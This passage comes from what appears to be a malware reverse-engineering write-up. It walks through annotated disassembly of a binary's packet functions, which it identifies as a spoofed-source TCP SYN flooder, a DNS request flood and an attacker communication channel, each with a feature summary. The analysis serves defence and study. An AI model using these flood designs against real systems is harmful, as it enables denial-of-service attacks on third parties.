0xffffffe9(%ebp) by 0xef. 0xffffffe9(%ebp) should correspond to the
beginning of the TCP flags. This seems extremely strange since the
values at the two bytes involved in the logical operations above do not
seem to be set previously.
0x8049ea3: movl $0x0,0xffffffe4(%ebp)
0x8049eaa: andb $0x50,%al
0x8049eac: movb %al,0xffffffe8(%ebp)
This results in the acknowledgement number being set to 0. %al should
not be given a guaranteed value at this time so once again, the setting
of 0xffffffe8(%ebp) is extremely strange.
0x8049eaf: movb $0x2,0xffffffe9(%ebp)
0xffffffe9(%ebp) earlier took part in the strange activity above, yet is
now set to a constant of 2. It seems strange that a C compiler would
have done the earlier code, possibly indicating a buggy compiler, or a
buggy programmer with buggy asm.
0x8049eb3: movw $0x0,0xffffffee(%ebp)
The 0 is placed into what looks to be the urgent data pointer in the tcp
header.
0x8049eb9: movl 0x18(%ebp),%eax
0x8049ebc: shll $0x8,%eax
0x8049ebf: addw 0x1c(%ebp),%ax
0x8049ec3: xchgb %al,%ah
0x8049ec5: movw %ax,0xffffffde(%ebp)
LongE and LongF seem to work together to form the tcp destination port.
0x8049ecb: movb $0x0,0xffffffb0(%ebp)
0x8049ecf: cmpl $0x0,0x38(%ebp)
0x8049ed3: jne 0x8049edb
It is unclear what 0xffffffb0(%ebp) is used for at this point.
0x38(%ebp) once again, still refers to LongM. If it is 0:
0x8049ed5: movl 0xffffffd8(%ebp),%eax
0x8049ed8: movl %eax,0xffffffac(%ebp)
0xffffffd8(%ebp) contains the destination IP that was set in the packet
buffer earlier.
Continuing:
0x8049edb: movb $0x6,0xffffffb1(%ebp)
0x8049edf: movw $0x1400,0xffffffb2(%ebp)
0x8049ee7: leal 0xffffffa8(%ebp),%ebx
0x8049eea: movl %ebx,0xffffff3c(%ebp)
0x8049ef0: movl $0x0,0xffffff34(%ebp)
0x8049efa: cmpl $0x0,0x38(%ebp)
0x8049efe: je 0x8049f5b
A lot of unknowns, until LongM is checked to be 0, if so:
0x8049f00: testl %esi,%esi
0x8049f02: jg 0x8049f5b
%esi is used as a counter in this function (will be seen soon). If this
counter reaches 0 (it is initially 0 too):
0x8049f04: movl 0x3c(%ebp),%ebx
0x8049f07: pushl %ebx
0x8049f08: call 0x804bf80
0x8049f0d: movl %eax,%edx
0x8049f12: testl %edx,%edx
0x8049f14: jne 0x8049f30
0x3c(%ebp) is BufferA, and is passed to the gethostbyname() function, as
has been seen in previous functions. The return is then checked to
ensure it didnt fail. If it did fail:
0x8049f16: pushl $0x258
0x8049f1b: call 0x80556cc
0x8049f20: movl $0x1,0xffffff34(%ebp)
0x8049f2d: jmp 0x8049f5b
We sleep(600), set 0xffffff34(%ebp) to 1, and jump.
If the gethostbyname is successful, Misc_Data_Copy is called to copy the
first IP address for the hostname to 0xffffff64(%ebp).
The same address is then copied more:
0x8049f44: movl 0xffffff64(%ebp),%eax
0x8049f4a: movl %eax,0xffffffd8(%ebp)
0x8049f4d: movl %eax,0xfffffff4(%ebp)
0x8049f50: movl %eax,0xffffffac(%ebp)
0xffffffd8(%ebp) is the packet destination address. 0xfffffff4(%ebp) is
unknown, and 0xffffffac(%ebp) has just become known. 0xffffffac(%ebp)
puts in another piece to solve a puzzle of the data starting at
0xffffffa8(%ebp). A lot of copies were unknown earlier but become clear
when it is realised that 0xffffffa8(%ebp) marks the start of a commonly
used 'pseudo' header. Earlier, values matching a protocol, tcp_length,
and destination address (if hostname wasn't used) were placed in this
location. It is not proven beyond doubt that this memory location is
indeed a pseudo header (used for generating the tcp checksum), but it
should definately be looked out for when the checksumming functions
occur.
0x8049f53: movl $0x9c40,%esi
%esi is the counter spoken of earlier. This is the point that sets the
counter, indicating that a hostname has just been resolved.
0x8049f5b: cmpl $0x0,0xffffff34(%ebp)
0x8049f62: jne 0x8049ef0
0xffffff34(%ebp) appears to be used an an indicator that gethostbyname()
failed (if it was called). It was earlier set to 0, and should remain 0
unless gethostbyname was called and failed. As such, if it is 0:
0x8049f64: call 0x8056058
This is a random() call, and is followed by MOD 0xc11 code. Following
this:
0x8049f73: addb $0x2,%ah
0x8049f76: xchgb %al,%ah
0x8049f78: movw %ax,0xffffffcc(%ebp)
512 is added to %eax, and the %al and %ah exchanged (htons()'d). The
result is placed into 0xffffffcc(%ebp) which should be the IP header ID
field. Effectively, this should make this field between 512 and 3600.
The same process is done again, this time with a MOD 0x579, addw 0xc8.
The value is inserted into the packet buffer:
0x8049f91: movw %ax,0xffffffea(%ebp)
This matches up with the tcp window, making it between 200 and 1400.
Yet again, the same process is followed, this time with a MOD 0x9c40,
incw %ax. The data is placed:
0x8049fa8: movw %ax,0xffffffdc(%ebp)
0xffffffdc(%ebp) corresponds to the TCP header's source port, making it
between 1 and 40000.
Still the same process, with a MOD 0x2625a00, leal 0x1(%edx) this time.
This is placed into 0xffffffe0(%ebp), the sequence number. The MOD and
leal 0x1, will result in the sequence number being between 1 and
0x2625a00.
And finally, once more we obtain a random number, MOD by 0x74, and 0x7d.
The result is placed into 0xffffffd0(%ebp) which is the IP packet's TTL
field, making it random between 125 and 240.
Continuing:
0x8049fd9: cmpl $0x0,0x20(%ebp)
0x8049fdd: jne 0x804a01c
0x20(%ebp) is LongG. If this is 0, a long process is undertaken which
leads to a result of a dotted quad string located at 0xffffff68(%ebp),
made up of random octets (excluding 255 for each).
Regardless of LongG, we continue:
0x804a01c: leal 0xffffff68(%ebp),%eax
0x804a022: pushl %eax
0x804a023: call 0x804ce8c
0x804a028: movl %eax,0xffffffd4(%ebp)
0x804a02b: movl %eax,0xffffffa8(%ebp)
This passes the random dotted quad through inet_addr and places the
result in two places, the IP header source address, and the believed
pseudo IP source address.
More setup:
0x804a02e: movw $0x0,0xffffffec(%ebp)
0x804a034: movw $0x0,0xffffffd2(%ebp)
0xffffffec(%ebp), the TCP checksum is set to 0.
0xffffffd2(%ebp), the IP checksum is set to 0.
0x804a03a: pushl $0x14
0x804a03c: leal 0xffffffb4(%ebp),%eax
0x804a03f: pushl %eax
0x804a040: leal 0xffffffdc(%ebp),%eax
0x804a043: pushl %eax
0x804a044: call 0x8056480
Misc_Data_Copy is called upon to copy 20 bytes from 0xffffffdc(%ebp) to
0xffffffb4(%ebp). We know that 0xffffffdc(%ebp) is the start of the TCP
header. We do not know at this time what the size of the TCP header
will be, but we assume 20 bytes. This 20 byte TCP header is copied to
what would be the tcp header duplicate in the pseudo header (12 byte
offset from 0xffffffa8(%ebp)).
What is believed to be checksum code is started. What we look for is
either 0xffffffa8(%ebp), or 0xffffffc8(%ebp) being used since these are
the beginnings of the pseudo and ip headers.
In looking over the code, %edx is used as a size field. It is initially
set like this:
0x804a04c: movl $0x20,%edx
Which seems to made 0x20 bytes initially looped through (while
incrementing the 'checksum' by the value of each byte). The fact that
this would appear to be calculating the checksum of 32 bytes gives it
away as being the pseudo header checksum. Indeed, eventually:
0x804a0b5: movw %ax,0xffffffec(%ebp)
This location directly corresponds to 16 bytes into the TCP header,
confirming it is indeed the tcp checksum(calculated from the pseudo
header).
Following this checksum, another seems to be done:
0x804a0b9: movl $0x14,%edx
Indicating 20 byte loop, and finally:
0x804a121: movw %ax,0xffffffd2(%ebp)
Placing the result checksum into 0xffffffd2(%ebp), the IP checksum.
We then setup for a call:
0x804a125: pushl $0x10
0x804a127: leal 0xfffffff0(%ebp),%eax
0x804a12a: pushl %eax
0x804a12b: pushl $0x0
0x804a12d: pushl $0x28
0x804a12f: leal 0xffffffc8(%ebp),%eax
0x804a132: pushl %eax
0x804a133: movl 0xffffff40(%ebp),%ebx
0x804a139: pushl %ebx
0x804a13a: call 0x8056c3c
This call is sendto(). The first parameter is 0xffffff40(%ebp) as
expected (the socket returned by socket() earlier). 0xffffffc8(%ebp) is
the buffer address to be sent, which does match up to the 'packet
buffer' than has been constructed all this time. The amount of data to
be sent is 0x28 (40 bytes), and 0xfffffff0(%ebp) does match up to an
AF_INET sockaddr structre that was defined very early in the function.
The sendto() is followed by:
0x804a142: cmpl $0x0,0x34(%ebp)
0x804a146: jne 0x804a154
This checks LongL. If it is 0:
0x804a148: pushl $0x12c
0x804a14d: call 0x80555b0
0x804a152: jmp 0x804a165
It will call a usleep(0x12c). If LongL is not 0:
0x804a154: cmpl %edi,0x34(%ebp)
0x804a157: jne 0x804a170
0x804a159: pushl $0x12c
0x804a15e: call 0x80555b0
0x804a163: xorl %edi,%edi
It will compare %edi, which appears to take on a role of a counter, to
LongL. If the two are equal, a usleep(0x12c) is called, and the counter
is reset.
0x804a165: decl %esi
0x804a169: jmp 0x8049ef0
%esi (used as a hostname re-resolve counter) is also decremented before
it jumps back up into the loop.
0x804a170: incl %edi
0x804a171: jmp 0x8049ef0
If %edi is not equal to LongL, it will increment it and jump back into
the loop.
Disassembly Review:
Another complex function, with a lot of duplicate code from the other
network functions. Once again, the sprintf(X, "X.X.X.X",A,B,C,D) is
used in conjunction with inet_addr to obtain long based IP addresses.
A buffer seems to be used, dedicated to setting up a TCP packet.
The fields of this buffer are filled in. If LongG is 0, the source IP
is random (without any 255 octets), else the octets are set to the
values contained in LongH, LongI, LongJ, and LongK.
The tcp destination port seems to be set by LongE and LongF.
LongL looks to be able to control the packets per second by using it as
a comparison to a counter (%edi) to determine when a usleep() is called.
If LongM is 0, the destination IP octets for the packets is set by
LongA, LongB, LongC, and LongD. If LongM is not 0, the hostname in
BufferA is looked up using gethostbyname(), and the first IP for it is
used as the destination IP. This hostname is periodically resolved, the
exact time between resolutions is unknown and will have to be done
during run-time testing.
The flags of the TCP packet do some strange actions to get them to a
stable point. It would appear that the compiler (or author) did some
strange actions upon them (some of which are voided).
In analysising sections of the code, the bigger picture is lost. The
outcome of the tcp flag section appears to be that 0xffffffe9(%ebp) is
set straight out to be 0x2 (overruled previous unreliable andb actions).
0xffffffe8(%ebp) ends up being set to %al which is strangely enough, set
to *0xffffffe9(%ebp) ANDB 0x50 ORB 0x50. The result of these operations
will obviously leave 0xffffffe8(%ebp) to 0x50, it is just noteworthy to
see the incredibly strange involvement of *0xffffffe9(%ebp).
The outcome of these operations will leave the TCP doff field set to 5
(indicating a 20 byte tcp header), and all other flags 0 except SYN.
Function Overview:
Yet another 'packetting' function. This time an obvious SYN flooder.
The attack is made rather potent by the randomising of many of the
fields such as the TTL. The source address seems spoofable to
completely random IP's, or a single IP. The destination port is
settable to a unique port, while the source ports are always random.
The only comfort a victim to this attack can take is that any ingress
filtering done on obviously spoofed IP's should block a small amount of
the attack.
The amount of traffic generated by this function is variable by the
blackhat. The amount is dependant upon LongL, however exact packet-per-
second analysis versus this value will have to be done at runtime.
Features of this attack:
* TCP SYN flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X packets!
* Completely random, or a single IP spoofed as source.
* Attack speed is adjustable.
The network traffic generated by this function will be examined in
more detail in Network_Analysis_E.
g) Network_Function_E [0x8049564] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
0xffffbb44(%ebp))
Guesses at purpose:
Once again, believed to be a 'packetting' function due to similar
parameters and positioning.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH,
LongI, LongJ, LongK, LongL, BufferA)
Disassembly:
Once again, many of the parameters are copied into localised variables.
0x80495b8: leal 0xffffffdc(%ebp),%edi
0x80495bb: movl $0x8067698,%esi
0x80495c0: cld
0x80495c1: movl $0x9,%ecx
0x80495c6: repz movsl %ds:(%esi),%es:(%edi)
This sees to the copying of 9 longs from 0x8067698 to 0xffffffdc(%ebp).
(gdb) x/36b 0x8067698
0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x80676b8: 0x14 0x00 0x00 0x00
These longs look remarkably similar to those from Network_Function_B,
and it turns out the same source is used in both functions. Another
data copy follows:
0x80495c8: leal 0xfffffde8(%ebp),%edi
0x80495ce: movl $0x80676bc,%esi
0x80495d3: cld
0x80495d4: movl $0x7d,%ecx
0x80495d9: repz movsl %ds:(%esi),%es:(%edi)
This sees to the copy of 500 bytes from 0x80676bc to 0xfffffde8(%ebp).
Once again, 0x80676bc was seen in Network_Function_B.
Some variables are set up:
0x80495db: leal 0xfffff9d8(%ebp),%edi
0x80495e1: leal 0xfffff9ec(%ebp),%ebx
0x80495e7: movl %ebx,0xfffff988(%ebp)
0x80495ed: leal 0xfffff9f4(%ebp),%ebx
0x80495f3: movl %ebx,0xfffff984(%ebp)
0x80495f9: movw $0x2,0xfffffdd8(%ebp)
0x8049602: movw $0x0,0xfffffdda(%ebp)
And now comes the start of the 'real' code:
0x804960b: cmpl $0x0,0x34(%ebp)
0x804960f: jne 0x8049645
0x34(%ebp) is LongL. If it is 0:
0x8049611: movzbl 0xfffff9a0(%ebp),%eax
0x8049618: pushl %eax
0x8049619: movzbl 0xfffff9a4(%ebp),%eax
0x8049620: pushl %eax
0x8049621: movzbl 0xfffff9a8(%ebp),%eax
0x8049628: pushl %eax
0x8049629: movzbl 0xfffff9ac(%ebp),%eax
0x8049630: pushl %eax
0x8049631: pushl $0x806768a
0x8049636: leal 0xfffff9b8(%ebp),%eax
0x804963c: pushl %eax
0x804963d: call 0x804f808
This is an sprintf() call, once again to form a dotted quad from LongA,
LongB, LongC, and LongD at 0xfffff9b8(%ebp).
Another condition is done after the completion of the last. LongI is
checked:
0x8049645: cmpl $0x0,0x28(%ebp)
0x8049649: je 0x804964e
0x804964b: decl 0x28(%ebp)
If it is non-zero, it is decremented.
0x804964e: pushl $0xff
0x8049653: pushl $0x3
0x8049655: pushl $0x2
0x8049657: call 0x8056cf4
0x804965c: movl %eax,0xfffff98c(%ebp)
A socket() call with the same parameters as in previous network
functions. The socket descriptor is stored into 0xfffff98c(%ebp).
0x8049665: testl %eax,%eax
0x8049667: jle 0x80499d8
It is then tested to see if the socket() call was successful. If so,
it continues:
0x804966d: movl $0x0,0xfffff980(%ebp)
0x8049677: movl $0x0,0xfffff97c(%ebp)
0x8049681: pushl $0x400
0x8049686: pushl $0x0
0x8049688: pushl %edi
0x8049689: call 0x8057764
This function is believed to be a memset() and that assumption still
holds true. %edi was earlier set to 0xfffff9d8(%ebp). This call should
result in the 400 bytes starting at 0xfffff9d8(%ebp) being set to 0.
Continuing:
0x8049694: xorl %esi,%esi
0x8049696: cmpl $0x0,0x34(%ebp)
0x804969a: je 0x80496fc
0x804969c: cmpl $0x0,0xfffff97c(%ebp)
0x80496a3: jg 0x80496fc
%esi is set to 0 (perhaps indicating a loop). Two conditions are then
checked (much like in previous functions). Firstly, LongL is checked to
be non-zero, and then 0xfffff97c(%ebp) to be <= 0. 0xfffff97c(%ebp) was
recently set to 0 (this check probably occurs within a loop so only the
first iteration would be 0).
If both of these conditions are true:
0x80496a5: movl 0x38(%ebp),%ebx
0x80496a8: pushl %ebx
0x80496a9: call 0x804bf80
BufferA is pushed and gethostbyname() is called. This exact same code
has been seen several times before. If gethostbyname() fails, a
sleep(600) is done, and %esi is set to 1. If it succeeds, the first IP
address of the hostname in BufferA is copied to 0xfffff9b4(%ebp). This
address is then copied:
0x80496e6: movl %eax,0x10(%edi)
0x80496e9: movl %eax,0xfffffddc(%ebp)
Looking back, %edi should be 0xfffff9d8(%ebp). So the IP address is
copied into 0xfffff9e8(%ebp). The address is also copied into
0xfffffddc(%ebp).
Another interesting thing to happen:
0x80496ef: movl $0x9c40,0xfffff97c(%ebp)
This same number has been seen in other functions as a 'counter' that
will is set to 0x9c40 after each successful gethostbyname(). It is
decremented at timed intervals in other functions at which time when it
reached 0, it would redo the gethostbyname(). Looking at 0x804969c,
this function will most probably be identical in operation.
We then exit out of the above conditionals and continue:
0x80496fc: testl %esi,%esi
0x80496fe: jne 0x8049694
%esi was earlier xorl'd to 0, and should only be 1 if gethostbyname()
was called and failed (as seen in other functions).
If %esi is 0:
%esi is interestingly re-xorl'd to 0. This might indicate it forms
a new purpose for the remainder of this conditional.
A new conditional:
0x8049708: cmpl $0x0,0x34(%ebp)
0x804970c: jne 0x8049723
Once again, checking LongL. If it is 0:
0x804970e: leal 0xfffff9b8(%ebp),%eax
0x8049714: pushl %eax
0x8049715: call 0x804ce8c
0x804971a: movl %eax,0xfffffddc(%ebp)
0x804ce8c is an inet_addr() call, and 0xfffff9b8(%ebp) was earlier dot
quadded by the sprintf() call at 0x804963d. The resultant long is
placed into 0xfffffddc(%ebp).
Regardless of LongL:
0x8049723: movl 0xfffff978(%ebp),%edx
0x8049729: addl $0xfffffde8,%edx
0x804972f: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049733: pushl %eax
0x8049734: pushl %edx
0x8049735: movl 0xfffff984(%ebp),%ebx
0x804973b: pushl %ebx
0x804973c: call 0x805652c
The call to 0x805652c is unknown, but was briefly looked at in
Data_Function_B. It was assertained there that it formed a data copy
loop. In looking back at the analysis done at Data_Function_B, this
call *should* result in *0xffffffdc(%ebp,%esi,4) bytes being copied
from *0xfffff978(%ebp)+$0xfffffde8 to *0xfffff984(%ebp).
Looking up all these values reveals that 0xffffffdc is the list of 9
longs, each with values between 20 and 25. 0xfffff978(%ebp) was
earlier quite oddly set to %ebp. This means that $0xfffffde8 is
quite effectively a stack address! It should be noted that
0xfffff978(%ebp) will quite likely change for later iterations.
0xfffffde8(%ebp) is the beginning of the 500 bytes of data copied at
the very beginning of this network function.
The destination for the data copy is unknown at this point in time.
This function is followed by a random call() with:
0x8049749: movl $0xff,%ebx
0x804974e: cltd
0x804974f: idivl %ebx,%eax
0x8049751: movl 0xfffff984(%ebp),%ebx
0x8049757: movb %dl,(%ebx)
This should put a random byte (with exception of 0xFF) into
0xfffff984(%ebp). Interestingly enough, this is the first byte of the
data that we just finished copying!
The same process is done again, but this time:
0x804976c: movb %dl,0x1(%ebx)
It fills in the second byte of that same data buffer with another
random value.
A parameter check:
0x804976f: cmpl $0x0,0x2c(%ebp)
0x8049773: jne 0x804978c
0x8049775: cmpl $0x0,0x30(%ebp)
0x8049779: jne 0x804978c
This checks if LongJ and LongK are 0, if so:
We do the random() call with a MOD 0x7530. The result is placed
into %eax and execution is jumped to 0x8049796.
If LongJ or LongK is not 0:
0x804978c: movl 0x2c(%ebp),%eax
0x804978f: shll $0x8,%eax
0x8049792: addw 0x30(%ebp),%ax
The two parameters, LongJ and LongK make up the high and low order
bytes of %ax.
So depending if LongJ and LongK are 0, %ax has a random value (up to
0x7530), and if either is non-zero, %ax is filled with their values.
Once this is done:
0x8049796: xchgb %al,%ah
0x8049798: movl 0xfffff988(%ebp),%ebx
0x804979e: movw %ax,(%ebx)
%ax is effectively htons()'d, and the value placed into
*0xfffff988(%ebp). 0xfffff988(%ebp) was earlier set to
0xfffff9ec(%ebp). Other network functions have used this technique to
operate with ports. It is assumed 0xfffff9ec(%ebp) is a port, but
still no further assumptions can be made since we still dont know if
we are making a UDP or TCP packet, the port could be destination or
source, or even a sockaddr port (has been done before).
Continuing:
0x80497a1: movl 0xfffff988(%ebp),%ebx
0x80497a7: movw $0x3500,0x2(%ebx)
This is interesting, primarily because it is 2 bytes after the 'port'
number we just placed at 0xfffff988. 0x35 is easily recognisable as
port 53. We were earlier dealing with the same data that was used in
Network_Function_B for DNS based purposes, so it is quite likely that
This is the destination port, and the previous was a source port, all
being constructed once again in a 'packet buffer'.
Still with no hard evidence, we continue:
0x80497ad: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80497b2: addw $0x8,%ax
0x80497b6: xchgb %al,%ah
0x80497b8: movw %ax,0x4(%ebx)
0x80497bc: movw $0x0,0x6(%ebx)
Firstly, %ax is filled with one of those 9 20-25 values which start at
0xffffffdc. %esi is obviously used as an index which is initially 0.
8 is added to the value, then htons()'d, and finally stored at
0x4(%ebx). A 0 word is placed after that.
This almost confirms that a udp header was just created. Evidence
being the addition of 8 to the number (which was used as a datasize in
Network_Function_B) and the placement into what would be the length
field of the udp header. The 0 would correspond to the checksum.
A series of checks (in an OR line-up):
0x80497c2: cmpb $0x0,0xfffff99c(%ebp)
0x80497c9: jne 0x804983c
0x80497cb: cmpb $0x0,0xfffff998(%ebp)
0x80497d2: jne 0x804983c
0x80497d4: cmpb $0x0,0xfffff994(%ebp)
0x80497db: jne 0x804983c
0x80497dd: cmpb $0x0,0xfffff990(%ebp)
0x80497e4: jne 0x804983c
The locations checked correspond to the local copies of the parameters
(which were duplicated at the very beginning of the function). The
exact parameters are believed to be: LongE, LongF, LongG, LongH. If
all of these are zero, a long series of random() calls are done in
conjunction with setae's (setnc's) / andb masks. The outcome of this
process is the creation of 4 bytes 0-254. These bytes are placed
into 0xfffff9e4(%ebp) to 0xfffff9e7(%ebp).
If any of the above checks are non-zero:
0x804983c: movb 0xfffff99c(%ebp),%bl
0x8049842: movb %bl,0xfffff9e4(%ebp)
0x8049848: movb 0xfffff998(%ebp),%bl
0x804984e: movb %bl,0xfffff9e5(%ebp)
0x8049854: movb 0xfffff994(%ebp),%bl
0x804985a: movb %bl,0xfffff9e6(%ebp)
0x8049860: movb 0xfffff990(%ebp),%bl
0x8049866: movb %bl,0xfffff9e7(%ebp)
The values are quite simply placed directly into those memory
locations instead of random values.
Following on:
0x804986c: cmpl $0x0,0x34(%ebp)
0x8049870: jne 0x80498a2
LongL is checked, if it is 0:
0x8049872: movb 0xfffff9ac(%ebp),%bl
0x8049878: movb %bl,0xfffff9e8(%ebp)
0x804987e: movb 0xfffff9a8(%ebp),%bl
0x8049884: movb %bl,0xfffff9e9(%ebp)
0x804988a: movb 0xfffff9a4(%ebp),%bl
0x8049890: movb %bl,0xfffff9ea(%ebp)
0x8049896: movb 0xfffff9a0(%ebp),%bl
0x804989c: movb %bl,0xfffff9eb(%ebp)
A very similar data copy takes place, 4 bytes after the previous data
positions (Its fairly likely these will be IP addresses, but until
more packet details are uncovered, its useless analysing them).
Now comes the packet details we've been waiting for:
0x80498a2: movb $0x45,(%edi)
The 0x45 are assumed to correspond to an ihl and ip version of an IP
header. Once again, we will assume a packet buffer is in the making.
%edi would be the starting point, and was earlier set to
0xfffff9d8(%ebp). This means the previous data copies to addresses
starting at 0xfffff9e4(%ebp) would correspond to the source address,
then the destination address. While the IP header protocol field has
not yet been set, a UDP header seems to be in place, along with a copy
of data into an appropriate udp-data position. We should expect to
see packet buffer configured as UDP.
A random() call followed by MOD 0x82 code is then done. The result
has 0x78 added and:
0x80498b5: movb %dl,0x8(%edi)
Is placed into the TTL position. This means any TTL will be between
120 and 250.
Similar code again, this time the random number is MOD 255'd, then:
0x80498c5: movw %dx,0x4(%edi)
Directly placed into the IP ID field (note the lack of htons()).
0x80498c9: movb $0x11,0x9(%edi)
0x80498cd: movw $0x0,0x6(%edi)
Finally, we see the IP protocol field be set to 17 (UDP) as expected.
This is followed by the IP offset being set to 0.
Packet length calculations follow:
0x80498d3: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80498d8: addw $0x1c,%ax
0x80498dc: xchgb %al,%ah
0x80498de: movw %ax,0x2(%edi)
The first line grabs the indexed data length (indexed by %esi). 0x1c
is added, this is the size of a 20 byte IP header plus an 8 byte UDP
header.
The value it htons()'d and stored into the IP header total length
field.
0x80498e2: movw $0x0,0xa(%edi)
0xa(%edi) corresponds to the checksum, so the above line sets it to 0.
The checksum process is then believed to start:
0x80498e8: movl $0x14,%edx
Once again, forming a loop of 0x14 iterations (to process 20bytes).
The starting position is set to 0xfffff9d8(%ebp) which is the start of
the packet buffer. Eventually, we see:
0x8049951: movw %ax,0xa(%edi)
Which sets the IP checksum. This is followed by a call setup:
0x8049955: pushl $0x10
0x8049957: leal 0xfffffdd8(%ebp),%eax
0x804995d: pushl %eax
0x804995e: pushl $0x0
0x8049960: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049964: addl $0x1c,%eax
0x8049967: pushl %eax
0x8049968: leal 0xfffff9d8(%ebp),%eax
0x804996e: pushl %eax
0x804996f: movl 0xfffff98c(%ebp),%ebx
0x8049975: pushl %ebx
0x8049976: call 0x8056c3c
This is a simple sendto() call. It uses 0xfffff9d8(%ebp) as the send
buffer (as expected), and 0xfffff98c(%ebp) as the socket. 0x1c plus
the data amount is the total number of bytes to be sent (as expected).
0xfffffdd8(%ebp) marks a sockaddr structure which was setup under an
AF_INET family, with a port of 0, and address of the destination host.
Following this call, we see identical code to that which has been seen
before. The code responsible for timing sleep()'s and resolving of
BufferA (if chosen):
0x804997e: cmpl $0x0,0x28(%ebp)
0x8049982: jne 0x8049990
0x8049984: pushl $0x12c
0x8049989: call 0x80555b0
0x804998e: jmp 0x80499af
0x8049990: movl 0x28(%ebp),%ebx
0x8049993: cmpl %ebx,0xfffff980(%ebp)
0x8049999: jne 0x80499bc
0x804999b: pushl $0x12c
0x80499a0: call 0x80555b0
0x80499a5: movl $0x0,0xfffff980(%ebp)
0x80499af: decl 0xfffff97c(%ebp)
0x80499b8: jmp 0x80499c2
Basically, if LongI 0, it will usleep(0x12c). If not, it will check
LongI to see if it matches the value at 0xfffff980(%ebp). If it does,
it will usleep(0x12c), reset 0xfffff980(%ebp) back to 0, and decrement
0xfffff97c(%ebp) (a variable which upon reaching 0, indicates BufferA
should be re-gethostbyname()'d). This host resolution variable is
decremented if LongI is 0 aswell.
If LongI is non-zero AND it does not equal the value at
0xfffff980(%ebp), then this value is simply incremented.
0x80499bc: incl 0xfffff980(%ebp)
0x80499c2: addl $0x32,0xfffff978(%ebp)
Several variables are incremented. The first is not recognised, and
has not been seen before [in fact does not seem to be used anywhere in
the function!??!]. The second adds 50 to 0xfffff978(%ebp). This is
the pointer to the data component of the packet. This effectively
changes the UDP packet's contents.
%esi's counter use now becomes clear:
0x80499c9: incl %esi
0x80499ca: cmpl $0x8,%esi
0x80499cd: jle 0x8049708
%esi is used to keep track of the 9 data type states. It will keep
the loop going (by jumping back to 0x8049708) until %esi hits 9. At
which time:
0x80499d3: jmp 0x8049694
Execution passes back further to cater for the gethostbyname()
section.
It should be remembered that 9 x 50 bytes of data (500 bytes) were
copied in the beginning of the function. Also 9 longs were copied.
This accounts for these 9 states, ensuring that it cycles through
each.
Disassembly Review:
This function seems related to Network_Function_B, both in complexity,
data, and purpose. The basic theme behind this function is to send
packets to a single server, using the octets from LongA, LongB, LongC,
and LongD. An optional source looks to be able to be specified. If
LongE, LongF, LongG, and LongH are all 0, random source IP's will be
generated for every outgoing packet. If any of them are non-zero, then
they will be used as the source IP octets for every packet.
LongI seems to be used for timing, determining how many packets are sent
per second.
LongJ and LongK look to be used solely for setting the source port of
the attack. If they are both 0, a random source port 0-0x7530 will be
used.
LongL and BufferA are used in an identical way to the other network
functions. If LongL is 0, LongA-D are used as destination IP. If LongL
is non-zero, BufferA is used as a hostname to be looked up to obtain the
IP address.
The most interesting part of this function has been seen before in
Network_Function_B. That is, the cycling through of the 9 packet data
contents (and lengths). The purpose of which will surely be uncovered
in Network_Analysis_F
Function Overview:
If Network_Function_B is indeed a DNS amplification attack as suspected,
then this attack is expected to consume bandwidth on a DNS serving
machine. It launches an attack against a single server, being able to
spoof DNS requests from random addresses.
Features of this attack:
* DNS request flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X seconds(minutes)!
* Completely random, or a single IP spoofed as source.
* Request source port can be manually set, or random.
* Attack speed is adjustable.
The network traffic generated by this function will be examined in
more detail in Network_Analysis_F.
h) Network_Function_F [0x8048f94] - (Network)
Known Usage:
function(Buffer1, Buffer2, Buffer3, number)
Guesses at purpose:
From the positioning of this function, it is believed it will be
responsible for some communications channel from this binary, to the
blackhat.
Naming Conventions:
Parameters will be given the following names:
function(IP_Address, BufferA, BufferB, DataAmount)
IP_Address is named as such since the buffer only looks to be modified
in one position at the moment. That is, in the case sections of the
"Core Functionality" where it is set to the destination IP of an
incoming packet.
Disassembly:
Straight into it:
0x8048fa0: pushl $0xff
0x8048fa5: pushl $0x3
0x8048fa7: pushl $0x2
0x8048fa9: call 0x8056cf4
0x8056cf4 has already been identified as a socket() call. Matching it
up to a C function call:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
Next we check the result:
0x8048fae: movl %eax,0xffffffbc(%ebp)
0x8048fb4: cmpl $0xffffffff,%eax
0x8048fb7: je 0x8048fce
The socket number is placed into 0xffffffbc(%ebp). It is then checked
if it is -1 (fail) and if so, jumps to 0x8048fce, else:
0x8048fb9: movl 0x14(%ebp),%eax
0x8048fbc: addl $0x17,%eax
0x8048fbf: pushl %eax
0x8048fc0: call 0x805bd74
0x8048fc5: movl %eax,%esi
This function call is unknown, and disassembling it doesn't help to
uncover its purpose. It does not seem to do anything of much importance
so it will just be left as an unknown for now. As a parameter,
DataAmount+23 is passed and the return is recorded in %esi.
This value is tested:
0x8048fca: testl %esi,%esi
0x8048fcc: jne 0x8048fd8
If the return was 0, the network function returns with 0. Otherwise:
0x8048fd8: movl %esi,0xffffffc4(%ebp)
0x8048fdb: leal 0x14(%esi),%edi
0x8048fde: movl %edi,0xffffffc0(%ebp)
0x8048fe1: leal 0x16(%esi),%edi
0x8048fe4: movl %edi,0xffffffc8(%ebp)
%esi is obviously recorded, and a few pointers appear to be setup at
offsets of 20 and 22 bytes from it. These are also recorded.
0x8048fe7: movl 0x8(%ebp),%edi
The very first parameter, IP_Address (points to a buffer containing an
IP address) is copied to %edi. A slow (but simple) technique is then
used:
0x8048fea: movb (%edi),%al
0x8048fec: movb %al,0xc(%esi)
